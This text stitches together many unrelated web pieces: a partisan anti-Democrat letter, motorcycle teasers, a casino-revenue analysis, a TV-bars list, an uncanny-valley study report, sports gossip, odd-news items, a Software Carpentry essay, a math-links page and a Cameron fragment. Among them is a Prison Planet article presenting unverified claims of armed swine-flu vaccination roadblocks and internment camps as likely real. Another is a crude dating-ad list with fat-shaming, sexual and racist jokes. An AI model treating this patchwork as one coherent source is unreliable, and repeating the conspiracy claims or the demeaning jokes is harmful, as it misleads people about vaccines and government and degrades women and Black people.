For example , I have showed that no matter how high or low income taxes have been , the government still collects 19.5 % of GDP and that when income taxes on the rich are lower the rich pay a higher percentage of taxes collected .
Yet , for some reason which cannot be explained , you want to punish the rich and make them pay for the needs of the poor and you want to do this by raising taxes on them .
No amount of graphs , facts , or charts can change your minds .
You base your decisions on feelings , ideas , and emotions , rather than logic , rationality , and facts .
You claim to seek equality for all people , yet you somehow think that this can be accomplished by treating people unequally .
For example , no matter how well intentioned , affirmative action is unconstitutional as it gives preference to one group over another .
You openly disregard vast sections of the Constitution of the United States of America .
You ignore the 2nd Amendment and push for heavy restrictions on firearms , failing to realize that if these measures pass , only the law abiding citizens will give up their guns .
The criminals never will .
You ignore the 9th and 10th Amendments and push for greater Federal control over the States and the People .
And yet , you demand that the government recognize the right to privacy [ a right that is not explicitly mentioned in the constitution , although it is definitely a right of the people ] for the purposes of allowing abortion .
You cant have it both ways , either follow the Constitution , or dont .
Instead , you follow it and refer to it when it is convenient and ignore it the rest of the time .
Implementing the national health care system that you are pushing would be such a quagmire .
It will be unnecessarily expensive , it will involve the expropriation of American businesses by the government , and it will be inefficient .
It will also stifle future research .
Government does not innovate .
Private industries innovate .
The only reason that we can even talk about having a nationalized health care system is because of the innovations and improvements made by private companies in the past 100 years .
Furthermore , it is wrong to make people pay for the bad decisions of others .
What can be the rationale of forcing a person , say a Mormon who doesnt drink , smoke , over eat , or do drugs to pay for the health care of a person who drinks , smokes , and overeats ?
Should the person who has a healthier lifestyle be rewarded by having to pay less for health care ?
Shouldnt the person who has an unhealthy lifestyle be punished with worse health and higher health costs ?
How can you possibly oppose free trade ?
Free trade is the natural extension of trade .
By trade I mean the buying and selling of goods and services .
By natural extension , I mean that on the lowest level , trade exists between individuals and that free trade only means extending this practice to allow individuals and businesses from other nations to engage in this practice with individuals and businesses from our nation .
Free trade benefits all .
It allows the best quality good at the lowest cost to be sold on the open market to any person who is willing to pay for it .
You want the government to solve all of your problems .
Your policies expand the government run safety net and take away incentives to take risks .
It is not the job of the government to provide the public with housing , health care , and welfare .
Who is to pay for these things ?
I support stem cell research too , but quite a lot of people in this country have serious moral issues with it .
I dont understand how one party can be so insensitive as to use taxation to force people to pay for a practice that they liken to murder .
Let private labs do their own stem cell research .
We have the greatest scientists in the world .
Lets set them free to do research , rather than placing them under government supervision .
You arent liberals either .
You have expropriated the term liberal and used it for yourself .
The term liberal was not used to describe people like you , in fact , it was used to describe people like me .
A liberal was known as someone who supported individual rights , civil liberties , property rights , free trade , free markets , and a gold currency standard .
With the exception of some civil liberties , the Democratic party and most “ liberals ” disavow all of the above .
The term progressive is a far less accurate term than the term liberal .
For the vast span of human history , the people were at the will of the government .
The government provided the people with all of their needs , or chose to withhold the needs of the people , as it wished .
It was only when classical liberal ideas like those listed above entered into the minds of the governments were people truly free to pursue their own interests .
This freedom led to the progress that has been achieved in the past 250 years .
The United States of America was the first truly free society in the history of mankind .
Our society stressed individual and property rights and in a relatively short span of time became an advanced nation .
It is no accident that human history stagnated for so long when governments were in control of the people .
It is no accident that it was 1,000 years after the fall of Rome — well into the Renaissance Age ( a relatively free society ) before standards of living rose to what they had under the Roman Empire .
The technological progress that we have seen in the last two plus centuries is wholly due to the fact that people have been relatively free to pursue their own interests in this period without government intervention , regulation , control , and most importantly without the government being responsible for the health and well being of its citizenry .
And yet , so called progressives continue to push for the very ideas , programs , and controls that are incompatible with continued progress .
You Democrats are proud to be a part of “ The Party of Thomas Jefferson . ”
If Thomas Jefferson were alive today , he would spit in your face and denounce you in the strongest terms possible .
Thomas Jefferson was a man who absolutely hated the idea of a strong central government .
He is the man who said “ I consider the foundation of the Constitution as laid on this ground :
That “ all powers not delegated to the United States , by the Constitution , nor prohibited by it to the States , are reserved to the States or to the people . ”
To take a single step beyond the boundaries thus specially drawn around the powers of Congress , is to take possession of a boundless field of power , no longer susceptible of any definition . ”
Six time Socialist Party candidate Norman Thomas said : “ The American people will never knowingly adopt socialism .
But , under the name of “ liberalism , ” they will adopt every fragment of the socialist program , until one day America will be a socialist nation , without knowing how it happened .
I no longer need to run as a Presidential Candidate for the Socialist Party .
The Democratic Party has adopted our platform . ”
Prophetic words .
[ if you are a liberal , dont think im picking on you and leaving conservatives alone –tomorrow ill be writing about conservatives and Republicans ]
Americanly Yours ,
Phred Barnet
Please help me promote my site :
Share on Facebook
Become a fan on Facebook
Indian motorcycles
Lightning & Thunder :
An FTR flat tracker from Sweden
The flat track bug seems to have permeated all corners of the motorcycling world — including Sweden .
We love this very sharp Indian FTR 1200 , which comes from Blixt & Dunder , a parts and lifestyle shop in Malmö .
Friends Jonathan Falkman and Mattias Malmgren opened the shop two years ago in Sweden ’s third - biggest city .
Their shelves are …
Read more »
Custom Bikes Of The Week : 1 March , 2020 A nitrous - fueled Indian Scout racer in Siberia , the first Yamaha Yamaha FZX750 we ’ve featured , a classy Monster from Revival Cycles , and what appears to be a two - stroke Suzuki Katana … but is n’t .
Read more »
Revival of the machine : Herzbube ’s Indian Scout 101 BMW ’s annual Pure &Crafted show is a goldmine for seekers of unusual motorcycles , and not just those manufactured in Berlin .
At this year ’s shindig in Amsterdam , one of the most intriguing machines we spotted was this 1928 Indian 101 Scout , resurrected from the dead by Bernhard Elflein of Herzbube .
Bernhard has finally managed to arrange a… Read more »
David Hughes
Newscom
It 's never quite accurate to describe Las Vegas as a ghost town .
Even at five in the morning on a Tuesday , it 's liable to be more lively than your average main street or shopping mall .
But when I arrived there for a brief getaway last November , it was not the same bustling town I 'd been used to .
My flight from Houston was barely a third full .
There was no line at the taxi stand , and my cabbie told me that several of his friends had recently been laid off from construction work on a variety of new developments , many of which had been halted in midstream after financing dried up .
And when I arrived at Las Vegas Boulevard in the heart of the Strip , I found as many locals handing out postcards for dodgy escort services as tourists .
None of this , I suppose , should have been surprising : November was the nadir of the worst recession since the Second World War .
Nevertheless , conventional wisdom has long held that gambling is recession - proof .
In Las Vegas , it 's been anything but .
Gaming revenues received by local casinos were down 12 percent in 2008 as compared with a year earlier .
( This figure and all others in this article are reported on an inflation - adjusted basis . )
And 2009 will be even worse :
So far , revenues are off almost 15 percent from 2008 's already depressed figures .
The recession , then , appears set to cost Las Vegas more than a quarter of its business .
This is sobering news not just for those who have purchased property in Las Vegas economist Tyler Cowen recently stated that the real estate market would not recover there for another twenty years but also for cash - strapped state legislatures that are turning to casino gambling as a way to raise revenue .
Delaware , which already offers horse racing and slot machines , now plans to extend its law to permit table games like blackjack and , more controversially , sports betting .
In July , Ohio governor Ted Strickland signed an executive order to permit slot machines at horse tracks , while California began to allow offtrack betting on horse races for the first time .
Philadelphia will soon become the largest American city to permit casino gambling within city limits , although play will initially be limited to slot machines .
And in Texas where , ironically , no legal game of Texas hold 'em is available gaming advocates are hoping that Kay Bailey Hutchison will defeat gambling - averse incumbent Rick Perry in next year 's governor 's race , which would empower the state legislature to consider casino gambling there .
But desperate state governments looking to casinos to bail them out of their budget nightmares are likely to be disappointed .
The same may be the case with trying to tap other " sins " for revenue .
Nationally , sales of alcohol for off - premises consumption were down significantly last year , an unprecedented 9.3 percent in the fourth quarter , according to the Commerce Department .
The largest previous drop had been just 3.7 percent , between the third and fourth quarters of 1991 .
Alcohol consumption can at least be expected to bounce back a bit right ?
but a lot of the potential customers of the new casinos may be tapped out .
The year 2008 was the first time in history that total casino gaming revenues declined throughout the United States ( by about 5 percent according to industry estimates ) .
In most jurisdictions , gambling revenues max out quickly .
In Atlantic City , for example , which opened for business in 1978 , gaming revenues were no higher in 2008 than they were in 1986 , and 2009 is on pace to be the slowest year since 1983 .
Gambling revenues peaked in 2002 in Illinois , in 2000 in Mississippi , and in 2006 in Detroit , which had only begun to permit gambling ten years earlier .
The boom years in Vegas , when revenues nearly doubled , between 1989 and 2006 , might have led states to misread casino gambling 's upside potential .
What we 've witnessed , indeed , is something of a race to the bottom .
Shortly after President Reagan signed the Indian Gaming Regulatory Act in 1988 , which expressly permitted Indian tribes to open casinos under tribal - state compacts , states like Mississippi , Illinois , and Colorado seeing no reason to split their profits with the Seminoles or the Cherokee decided to permit their own state - run facilities .
Neighboring states , worried about losing their customers across state lines , then followed suit : Louisiana a year after Mississippi , Indiana and Missouri three years after Illinois , Michigan two years after Ontario , Canada .
Meanwhile , the Indian tribes continued to up the ante , their casino revenues approximately tripling from 1997 to 2006 .
Map by Ken Leung ; Source : American Gaming Association
We have now reached the point at which residents of seventeen of the twenty largest metro areas are within a three - hour drive of a blackjack table .
And Washington , D. C. , will make it eighteen once Delaware permits blackjack , leaving only Dallas and Atlanta .
Just about everyone who wants to gamble in the United States is already a morning 's drive away from being able to do so ; with the possible exception of isolated Texas , states that open new casinos will mostly be stealing customers from one another .
Las Vegas managed to buck the trend for a while by promoting itself as a luxury destination for wealthy adults .
And the higher - end clients were willing to make bigger bets : Las Vegas gamblers spend about three - and - a - half times more per visit on gambling , for instance , than customers on the riverboats of Mississippi .
But it may have been that same formula that rendered Las Vegas especially vulnerable to the recession .
Gambling receipts in Vegas did n't suffer much in prior recessions like the 1990 - 1991 bout , but the Las Vegas of 2009 has become much more reliant on a relatively small number of higher - end customers who are self - consciously looking to splurge .
Map by Ken Leung ; Sources : Nevada Gaming Control Board and New Jersey Casino Control Commission
Still , the outlook there may be brighter than in other gambling destinations .
With all due respect to Philadelphia , tourists are n't likely to flock there once they can play slots any more than they did before .
The sort of customers these lower - end casinos attract , moreover , may be exactly the sort who should n't be spending their money on gambling .
A 2005 study by the Federal Reserve found a statistically significant relationship between proximity to casinos in Mississippi and bankruptcy rates in the region , which includes impoverished states like Alabama and Tennessee .
As someone who has spent more than a few hours at the blackjack table and has a libertarian streak to boot I have absolutely no business telling states they should n't open more casinos .
But as much as they 'd like to , they 're not likely to find a lot of money there .
Nate Silver runs the political Web site FiveThirtyEight.com .
RELATED LINKS :
This content is created and maintained by a third party , and imported onto this page to help users provide their email addresses .
You may be able to find more information about this and similar content at piano.io
There are places to meet friends for drinks ... and then there are bars , my friends .
Places where the drink is the thing , and the goal is drunk .
That in mind , there are some TV bars where you just would n't want to be , like Rosie 's from M.A.S.H. ( bad booze near the front of the Korean conflict ) or the Bronze from Buffy ( tough to drink and quip and fight vampires all at the same time ) , or Archie Bunker 's Place ( where you have to put up with Archie Bunker ) .
And then there are the bars where the booze is n't the main focus , such as the Bada - Bing ! from The Sopranos ( topless dancers ) , 90210's Peach Pit After Dark or Melrose Place 's Shooters ( looking pretty while snorting coke ) or Star Trek : TNG's Ten -Forward ( showcasing Whoopie Goldberg ) .
Fortunately , there are a lot of watering holes on the other side of the spectrum -- joints where you 'd love to spend quality time with a small shot glass , a chaser of beer , and the infinite possibilities inherent in draining them over and over again .
So hoist your glasses , grab your remote , and do n't forget to tip your waitresses .
Just out of the top ten : Phil's ( Murphy Brown ) , Danny's Place ( Quincy , M.E. )
10 . Isaac 's Bar , The Love Boat
If you 're on The Love Boat , you 're going to need drinks .
Strong drinks .
This place is lousy with broken hearts , sappy love stories , and faded stars .
And , you know , Gopher .
Good thing Isaac makes a mean Mai - Tai , even if he is the only bartender on the Pacific Princess .
9 . The Boar 's Nest , Dukes of Hazzard Okay , so there 's a down side : Boss Hogg owns the place ( which explains the name , at least ) , and has an office in the back where he hatches plans and lets Roscoe P. Coletrane giggle .
But this Dukes of Hazzard roadhouse has two major assets : Daisy Duke and her ... considerable waitressing skills .
Oh , and also the jugs of moonshine on every table and in the trunk of every car .
8. McLaren's , How I Met Your Mother A relative newcomer to TV 's drinking scene , this bar from How I Met Your Mother has distinguished itself by offering not only an impressive average of nine flashbacks per character per half - hour , but also the ability to apparently reserve the exact same four - top booth in a crowded New York bar .
Better yet , these are not characters that nurse their drinks , or choose the hang in a quaint coffee shop with fluffy couches and scones .
These are drinkers , pure and simple .
7 . The Warsaw , The Drew Carey Show Drinking was such a part of The Drew Carey Show that this blue - collar Cleveland bar felt like an extension of the characters ' homes : living room , kitchen , bathroom down the hall , Warsaw .
And it nearly was : Oswald and Lewis lived in the apartment above the bar , and Mimi and Steve bought the house right next door .
That 's some serious and admirable dedication to beer .
6. The Drunken Clam , Family Guy
Once known as " St. Elmo's Clam , " this Quahog staple of drink is usually just referred to by patrons as " the Clam . "
Not to be confused with the Fuzzy Clam , which is a nude bar down the way a bit , or Ye Olde Pube , which Peter built in his basement .
But no matter the name , no matter the competition , the regulars keep returning to this tavern -- including God himself , trolling for barflies .
5 . The Smiling Goat , Ed Ah , Stuckeyville .
If there was more than a snack bar in the Stuckeybowl , the Smiling Goat might have had some serious competition .
But instead , it 's the go - to place to wine , dine , and charm the freakin ' pants off that girl you fruitlessly crushed on in high school .
So long as you have about four years to close the case , that is .
4 . Regal Beagle , Three 's CompanyThere 's a reason that Jack , Janet , and Chrissy hung out here : because it was awesome .
Theme ?
The Regal Beagle does n't need any stinking theme .
So what if they have orange striped wallpaper and low - hanging lumber beams and about six shades of red all over the place ?
This was where it was at , man .
Think about it : if open - shirt Larry could get some here , even Mr. Furley 's got a shot .
That 's got to have something to do with the strength of those margaritas .
3 . Moe's , The Simpsons
Where else can you get a Flaming Moe , hear stupendous prank calls , and drink Duff Beer until you resemble Barney Gumble ?
Yes , it 's Moe 's , Springfield 's dankest watering hole .
It 's the sort of place that 's the antithesis to the home - spun bar -- where everybody knows your name but no one really cares .
The sort of place that can honestly inspire this line : " Here 's to alcohol : the cause of , and solution to , all of life 's problems . "
2 . The Brick , Northern Exposure :
What is there to do in Cicily , Alaska after dark ?
Lots , actually .
You and Chris could share a beer and explore the relationship of Sartre to Spider Man .
With Ed , you could discuss the juxtaposition of the films of Ingmar Bergman and Keanu Reeves .
Or belly up to the bar and join in that debate between Maurice and Holling about how AARP politics has completely ruined professional hockey .
And all of that happens in one place , where all cultures seem to converge : The Brick .
It 's a bar , it 's a restaurant , it 's a state of mind -- a place where pretty much the entire town congregates to put the world in context and to drink to excess to forget how freakin ' cold it is .
And I have n't even mentioned Maggie -- if there were ever two reasons not to leave Alaska , Dr. Fleischman , they were Maggie and The Brick .
Not necessarily in that order .
1 . Cheers , CheersOkay , you knew this was going to be number one .
But here 's the thing : it should be .
As great as the Brick is , it 's not completely about the booze .
Cheers is .
Oh , sure , there 's some fun to be had , some friends to make into a surrogate family , blah , blah , blah .
But really , sometimes you do n't give a crap if anyone knows your name .
You just want a drink .
And Cheers was cool with that .
You could sit in the corner booth near the piano and just drink until you were sick .
Cheers was hardcore .
The regulars spent seemingly every night there , often until closing time , ignoring their home lives ( or the fact that they did n't have one , Cliff ) .
They drank to excess every night , whether or not they were a failed accountant or a renowned psychiatrist .
It seems almost cliché to put Cheers at the top of the list , but it 's there for a reason : it deserves to be .
Bottoms up folks : you do n't have to go home , but you can't stay here .
Monkeys are freaked out by almost - but - not - quite - real depictions of themselves .
That tendency is well documented in humans , but has never before been seen in another species .
To test their preference , researchers showed macaque monkeys real pictures , digital caricatures and realistic reconstructions of other monkey faces .
To the latter , the macaques repeatedly averted their eyes .
" The visual behavior of the monkeys falls into the uncanny valley just the same as human visual behavior , " wrote Princeton University evolutionary biologists Shawn Steckinfinger and Asif Ghazanfar in a paper published Monday in the Proceedings of the National Academy of Sciences .
The " uncanny valley " was identified in 1970 by Japanese roboticist Masahito Mori , who noticed that people presented with likenesses of increasing realism respond with increasing empathy , right up to the point where the likenesses are almost real .
At that point , people are repulsed .
The sudden dip in graphs describing their response gave the phenomenon its name .
Many explanations have been suggested for the uncanny valley , which has also been blamed for the box - office failure of movies like Beowulf and Final Fantasy .
Perhaps almost - real humans look a bit too much like corpses for our comfort ; perhaps they 're so real that they engage our brains ' mate - recognition or disease - avoidance systems , which promptly identify poor partners or sick individuals .
The PNAS results do n't favor any one of these explanations , but do suggest that the uncanny valley has evolutionary origins deep in the primate psyche .
It remains to be seen how the monkeys would react to a simian version of The Polar Express .
Images : PNAS
See Also :
Citation : " Monkey visual behavior falls into the uncanny valley . "
By S. Steckenfinger & A Ghazanfar .
Proceedings of the National Academy of Sciences , Vol 106 .
No. 40 , October 12 , 2009 .
Brandon Keim's Twitter stream and reportorial outtakes ; Wired Science on Twitter .
Brandon is currently working on a book about ecosystem and planetary tipping points .
QR Code Link to This Post
Location : River North
it 's NOT ok to contact this poster with services or other commercial interests
" Baggage " - I can't deal with actual human beings " Curvy " - fat " Drama free " - I 'm still bitter and involved with the last guy who got me pregnant " Love to laugh " - I am a boring as hell so hopefully you can make it entertaining " Looking ... " - spam " Must love ... " - spam" Partner in crime " - I 'm as clever and interesting as a brick " Seeking ... " - spam" Sensual " - fat" Something real " - spam" Treat me ... " - fat black woman with a highly undeserved sense of entitlementNo picture - fatPicture of sunset , flower , cocktail , eyes - fatThree or four sentence post of superficial crap with picture of cute or hot woman - spam" Not looking for sex " - I 'll blow you Five paragraphs long post - I 'm fucking insaneM4W " see what happens " - I 'm hoping for at least a fingerbang " down to earth " - boring " sincere " - needy " romantic " - needy " drama - free " - I need a vagina that wo n't bother me after I 'm done with itNo picture - I resemble a creature from Middle - earthPicture of anything else other than a person - I will give you an STD " Love to eat pussy " -
Do n't really know which part the pee or the baby comes out of " spoil you " - I hope you 're into watersports " lets chat " -
My other hand is on my erection " love [ music , movies , tv ] " - I'm a cultural retard " experienced " - one or two date rape convictions
Profiles : Steve Nash | Shaquille O'Neal
O'Neal reacts to controversy surrounding " Shaq Vs . "
The most entertaining part of the new reality show , " Shaq Vs. " ?
The credits .
Tuesday 's debut , which featured Shaquille O'Neal taking on Pittsburgh Steelers quarterback Ben Roethlisberger in football , was a tad long and a bit contrived .
It became decidedly more interesting , though , when the credits rolled and this name popped up as one of the executive producers :
Steve Nash .
There 's an interesting back story here , one that explains in part some of the fractured relationships that defined the Suns ' struggles last season .
O'Neal stole Nash 's idea .
Shortly after O'Neal was traded to the Suns in February 2008 , Nash mentioned to his new teammate a reality show he was pursuing .
It would feature the Suns point guard taking on professional athletes in their own sport .
The topic did n't come up again until early in the 2008 - 09 season , when O'Neal boarded the Suns bus and told the team he would be starring in a new reality show in which he would be taking on , you got it , professional athletes in their own sport .
" You mean the idea you stole from me ? " one Suns representative said he heard Nash say .
Nash eventually sought out an entertainment lawyer , according to sources , which is why he now has an executive - producer credit and the compensation that comes with it .
When reached Wednesday , Nash would not confirm the story .
" We collaborated on parts of the show , " he said .
" I support him 100 percent .
I thought the first episode was a fantastic episode , and I can't wait for the next one . "
That 's something you would expect Nash to say .
He often has played the role of locker - room peacemaker .
He is known as a teammate who diffuses tough situations before they escalate .
In reality , a source close to Nash said , " Steve was pissed .
He could n't believe Shaq 's lack of integrity . "
The experience set the tone for some shaky chemistry on the court .
Off it , Nash found himself in a difficult situation , trying to co-exist with a teammate who had blindsided him .
" He 's moved on , " the source said .
" He really does want the show to succeed . "
Calls made to O'Neal 's representatives were not returned .
Being a teammate of O'Neal 's is a bit like falling into the rabbit hole .
Several years ago , when O'Neal played for Miami , he referred to Nash 's back - to - back MVP awards as " tainted . "
He later back - pedaled .
The 2008 - 09 season was trying from the start .
The team struggled under new coach Terry Porter 's deliberate system .
In December , the Suns traded one of Nash 's best friends , Raja Bell , with Boris Diaw , to Charlotte for Jason Richardson and Jared Dudley .
During the All - Star break , they fired Porter and replaced him with assistant Alvin Gentry , who steered the Suns back to their up - tempo ways .
Several days after Gentry took over , All - Star power forward Amar� Stoudemire underwent season - ending surgery to repair a detached retina .
The Suns were out of the playoffs for the first time in five years .
Here 's a hunch that when the Suns decided to trade O'Neal to Cleveland in late June , it helped Nash arrive at his decision to sign an extension with the Suns a month later .
Here 's a hunch that chemistry on this team will be better in the 2009 - 10 season , too .
Nash enjoys playing for Gentry and is happy his friend Grant Hill is back .
He 'll have his pick - and - roll mate , Stoudemire , and an offense that should be more fluid .
Nash might be 35 , but let 's not forget he recently became the first NBA player to shoot more than 50 percent from the floor , 90 percent from the line and 40 percent from 3 - point range for three consecutive seasons .
How long " Shaq Vs. " lasts remains to be seen .
It landed a 2.7 rating locally , which means approximately 48,670 Phoenix homes tuned in to the ABC show .
NBC's " America 's Got Talent " received a 7.6 rating locally , and CBS 's " Big Brother " took a 3.9 rating .
In future shows , O'Neal is scheduled to compete against swimmer Michael Phelps , boxer Oscar De La Hoya and tennis star Serena Williams .
O'Neal might have other battles in his future as well .
Author Todd Gallagher says the show is a rip - off of his book , " Andy Roddick Beat Me with a Frying Pan , " according to TMZ , and is pursuing legal action .
" Shaq Vs. " is a reality show , but O'Neal 's life more resembles a drama .
The Suns are better off without it .
Profiles : Steve Nash | Shaquille O'Neal
O'Neal reacts to controversy surrounding " Shaq Vs . "
Reach Boivin at paola.boivin@arizonarepublic.com or 602-444-8956 .
Follow her on Twitter at Twitter.com / PaolaBoivin .
Girls trapped in storm drain use Facebook to call for help . . . instead of phoning emergency services
Trapped :
The girls used Facebook to alert people to their predicament
Two girls aged ten and 12 who were trapped in a storm drain used Facebook to get help instead of calling the emergency services .
The girls updated their status on their mobile phones to say they were trapped instead of dialing triple ' 0 ' , the Australian emergency services number .
Firefighters eventually rescued the pair after being contacted by one of their male school friends .
The friend had been online and saw they were trapped .
The drama happened near Adelaide , Australia .
Firefighter Glenn Benham , who took part in the rescue , said : ' These girls were able to access Facebook on their mobile phones so they could have called the emergency services .
' It seems absolutely crazy but they updated their status rather than call us directly .
' We could have come to their rescue much faster than relying on someone else being online , then replying to them , then calling us .
' It is a worrying development .
' Young people should realize it 's better to contact us directly .
' Luckily they are safe and well .
It 's awful to think what could have happened because of the delay . '
A New Zealand dog had a lucky escape after taking its owner 's ute for a drive and crashing into a cafe .
It seems Wilco , a staffordshire - ridgeback cross , got tired of waiting for his owner , who had ducked into a shop in the South Island town of Cromwell .
Wilco pushed the gear stick into drive and the vehicle rolled about 15 metres before crashing into the Fusee Rouge Cafe .
Cafe owner Jacynda Wallace said it was a big shock .
" The dog was in the truck and the man was on the phone ringing his insurance company , " she said .
" Everyone is talking about it .
Lots of people from Auckland are talking about it and TV One , TV3 have rung me . "
Ms Wallace says the front doors of her cafe will have to be replaced but she might name a sandwich after Wilco .
One of the lessons we learned at Los Alamos National Laboratory in the 1990s and early 2000s is that most scientists do n’t actually want to learn how to program — they want solve scientific problems .
To many , programming is a tax they have to pay in order to do their research .
To the rest , it ’s something they really would find interesting , but they have a grant deadline coming up and a paper to finish .
Getting scientists to make time to learn fundamental ideas that are n’t directly relevant to the problems in front of them is an even harder sell .
Partly it ’s those pesky deadlines again , but it ’s also often the case that the big picture does n’t make sense until you have first - hand experience with the details .
Take abstraction , for instance , or the difference between interface and implementation : if you have n’t written or modified software where those ideas saved you time and heartache , no amount of handwaving is going to get the idea across .
The problem , of course , is that it ’s impossible to program well without understanding those bigger concepts .
Software Carpentry therefore has to :
Give scientists programming skills that have a high likelihood of paying large dividends in the short term .
Convey the fundamental ideas needed to make sensible decisions about software without explicitly appearing to do so .
Based on our experiences in the last 12 years , the skills that students need are fairly settled :
Clean coding ( both micro - level readability and macro - level modularity )
Version control
Process automation for building , testing , and deploying software
How to package software for distribution and deployment
Managing information and workflow ( from bug trackers to blogs )
Consuming data :
Text ( line - oriented parsing with regular expressions ) Hierarchical ( XML ) Binary Relational
Building desktop GUIs and visualizing data
Basic security : public / private keys , digital signatures , identity management
Publishing data and providing services on the web
As Karen Reid and others have pointed out , doing all of that properly would earn you at least a minor in Computer Science at most universities .
Cramming it into two weeks is simply not possible .
The bigger picture stuff is n’t as clear yet , but is starting to come into focus .
The buzzword du jour , computational thinking , means different things to different people , but Jon Udell ‘s definition is a good starting point .
For him , computational thinking includes :
Abstraction : ignoring details in order to take advantage of similarities A key concept is the difference between interface and implementation
Querying : understanding how fuzzy matching , Boolean operations , and aggregate / filter dataflow works
This depends somewhat on understanding how to think in sets
Structured data : including hierarchical structure , the notion of meta - data ( such as tagging and schemas ) , and so on Equally important is understanding that programs work best with structured data , so structure improves findability and automation
Automation : having the computer do routine tasks so that people do n’t have to
Indirection : giving someone a reference to data , rather than a copy of the data , so their view of it is always fresh
Syndication : publishing data for general use , rather than sending it directly to a restricted set of people
The inverse is provenance : where did this data come from , and what was done to it ?
I would like to add all of the following , though I realize that doing so gets us back into “ B.Sc. in a week ” problems :
Name spaces , call stacks , and recursion
Computational complexity : why some algorithms are intrinsically faster than others
How data is organized : Values vs. references and the notion of aliasing By- location structures ( lists , vectors , and arrays )
By - name structures ( dictionaries and records )
By - containment structures ( trees ) By - traversal structures ( graphs )
Programming models : Procedural Aggregate ( whole - array , whole - list , etc. )
Object - oriented Declarative Event - driven ( which brings in the difference between frameworks and libraries
Programs as data Functions as objects ( another form of abstraction ) Programs that operate on programs ( Make , drivers for legacy programs )
Quality , including :
What makes good code better than bad code ( psychological underpinnings )
Testing ( including the economics of testing ) Debugging ( the scientific method applied to software )
The difference between verification ( “ have we done the thing right ? ” ) and validation ( “ have we done the right thing ? ” )
Continuous improvement via reflection on root causes of errors
Basic concurrency : Transactions vs. race conditions Deadlock ( much less important in practice )
Handling failures
Bricolage : how to find / adapt / combine odds and ends ( these days , on the web ) to solve a problem
I call on all of this knowledge routinely even when solving trivial problems .
This morning , for example , I :
did a search to find a wiki markup processor I could run from the command line ,
downloaded and installed it ,
changed five lines in the main routine to insert some extra text in its output ,
added a ten - line filter function to overwrite the inserted text with some command - line parameter values , and
added fourteen lines to a Makefile to turn the wiki text into HTML whenever it ’s stale .
It took roughly 15 minutes , and will save me hours in the weeks to come .
However , it only took 15 minutes because I ’ve spent 29 years mastering the skills and ideas listed earlier .
The challenge in creating Version 4.0 of this course will be to figure out how to convey as many of those skills and ideas can be squeezed into two weeks .
Man claims armed military personnel at roadblock forced people to enter mobile trailers
Paul Joseph Watson
Prison Planet.com
Monday , September 28 , 2009
The testimony of a woman who claimed she was part of a military drill in California centered around setting up roadblocks to check if people had received the H1N1 vaccine has potentially been validated with another report of a swine flu checkpoint near San Diego .
Earlier this month we reported on the You Tube video of a woman who claimed to have taken part in an Army exercise which involved setting up roadblocks and checkpoints so authorities could check who has received the swine flu vaccine .
Those who have had the shots will be fitted with an RFID bracelet so they can be tracked .
Those who have not taken the shot will be offered it there and then and if they still refuse , will be carted off to an internment camp , according to the woman .
Former Kansas state trooper Greg Evensen spoke of similar checkpoints recently , when he told an audience in West Virginia that preparations to enforce mandated vaccinations were being focused around preventing those who have n’t had the shot from traveling .
“ I have been told by state troopers across the country that there are plans ready to be implemented that would include roadblocks and choke points as we call them , major interstate junctions around major cities and so forth where the greatest number of people can be held until they prove their vaccination by papers , ” Evenson said , adding that permanent RFID bracelets would then be used to identify those who had taken the shot .
A d v e r t i s e m e n t
“ I have been told that the plans would include buses standing by for people at roadblocks that refuse to take the inoculation , ” added Evenson , saying that such refusniks would then be taken to military bases and imprisoned .
“ Get your shot or get on the bus , that ’s what ’s coming , ” warned Evenson .
Authorities in Boston have already trialed RFID bracelet technology , with the purpose of creating a “ vaccination map ” charting which people have taken the vaccine and which have not , or “ creating a citywide registry of everyone who has had a flu vaccination , ” as a Boston Globe article describes .
Participants were given a bracelet with a unique identifier code , exactly as described in the You Tube clip of the woman ’s testimony .
We have now received yet another report of a roadblock staffed by armed military personnel centered around checking whether people have received vaccines .
A reader e mailed us a photo ( see top of page ) and the testimony of his friend who was traveling from California to Arizona after visiting friends .
The man was driving through mountains east of San Diego when he came across a roadblock .
( ARTICLE CONTINUES BELOW )
“ As I neared the border they had a checkpoint set up but not the usual stateline checkpoint , ” he writes .
“ As I approached I noticed armed military personnel had most of the cars pulled over and there were a lot of people going in and out of a mobile trailer .
The people looked confused and some upset .
Seeing what was going on made me really nervous , ” the man adds .
He was then approached by a women in military fatigues who asked him where he was driving and “ something about a vaccination . ”
“ I got scared and told her I was a state geologist doing field research and because I was doing so much driving back and forth I had my vaccine on campus .
She did n’t say anything for a few seconds and then the car behind me started honking and she got pissed and waved me on .
I was so scared ! , ” he concludes .
The truck with the green stripe seen in the image is undoubtedly a border patrol car , but a blow up of the picture shows men dressed in military cammo , not the usual single color green uniform of border patrol agents .
One of the men on the left hand side of the car in front appears to be carrying a large firearm .
Whether this was just another of the sprawling internal checkpoints that are now popping up all over the country is open to debate , but the fact that vaccines were mentioned indicates that this was potentially another drill in preparation for a mass swine flu outbreak .
The addition of mobile trailers and unhappy people being forced to leave their cars and undergo some form of involuntary procedure hints that this could have been something even more ominous .
See the enlarged image below .
This article was posted : Monday , September 28 , 2009 at 5:08 am
Print this page .
Infowars.com Videos :
Comment on this article
Redirected from " Online Resources " .
Note : math blogs and math blogs both redirect for " Online Resources " .
Math blogs and wikis
This page lists links to blogs , and online mathematical communities like forums and wikis .
For links to main repositories of free books , lectures , videos , reviews and math papers see math archives and for a list of societies and institutions see math institutions .
A higher level branch page is math resources .
Math is here just a mnemo , this page pertains also to the related areas of interest for n n Lab like LaTeX , physics , philosophy , theoretical computer science etc .
For a quick introduction to math blogging , see
See also MO question : most helpful math resources on the web , the directory of many math blogs with alerts on recent updates www.mathblogging.org.
For a decent list of online seminars see researchseminars.org /
Please help with improving this page : add links that are missing ;
add information to links on what kind of activity tends to go on at the sites being linked to .
Note :
To maintain the quality and relevance of this list , any new links not containing a brief description may be removed .
Math blogs and wikis
Mathematics
Wikis and online encyclopaedias
Forums
Current Blogs
Older Blogs ( last is entry over a year old )
Probability and Statistics
Blogs
Wikis
Math - related
Blogs
Technical help with math blogs
In his Commons office , David Cameron has artists ' drawings of two previous Tory leaders : Winston Churchill and Harold Macmillan .
Why not Margaret Thatcher ?
In a revealing BBC interview this week , Mr Cameron told the journalist Peter Oborne : " The Conservative Party should both revere her [ Baroness Thatcher 's ] inheritance and what she did , and also move on and draw on some of the history of conservatism , which is about society as well as the economy , and which does have this One Nation tradition of wanting to bring the country together at its heart . "
In his speech to his party conference this month , the Tory leader set out to prove there is no internal contradiction in his self - styled " progressive conservatism " .
